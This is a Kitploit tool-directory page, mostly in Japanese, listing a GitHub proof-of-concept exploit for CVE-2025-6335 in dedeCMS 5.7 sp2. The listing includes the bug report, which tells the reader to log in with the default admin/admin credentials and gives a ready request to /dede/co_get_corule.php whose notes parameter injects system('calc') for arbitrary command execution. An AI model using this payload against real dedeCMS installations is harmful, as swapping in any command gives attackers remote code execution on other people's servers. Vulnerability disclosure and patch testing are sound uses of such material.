Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6335 — CVE-2025-6335 の概念実証エクスプロイト。dedeCMS 5.7 sp2 におけるテンプレートインジェクションによるコマンド実行の脆弱性を悪用し、バックエンドインターフェース経由で任意のコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/jujubooom/cve-2025-6335
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

CVE-2025-6335 の概念実証エクスプロイト。dedeCMS 5.7 sp2 におけるテンプレートインジェクションによるコマンド実行の脆弱性を悪用し、バックエンドインターフェース経由で任意のコマンド実行を可能にします。

リポジトリを見る
611年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

BUG_Author: Ewoji

Affected Version: dedeCMS < 5.7.2

Vendor: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

Vulnerability Files:

  • /include/dedetag.class.php

Description:

  1. After install,Log in to the background

    • Use the default account password admin/admin
  2. Exploiting the Template

    • Access the dede/co_get_corule.php interface
    • Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command
  3. Verifying the Exploit:

    • If the injection is successful,The attacker will execute arbitrary commands

Proof of Concept:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command

detail:CVE-2025-6335-dedeCMSバックエンドテンプレートインジェクションRCE

ツールをダウンロード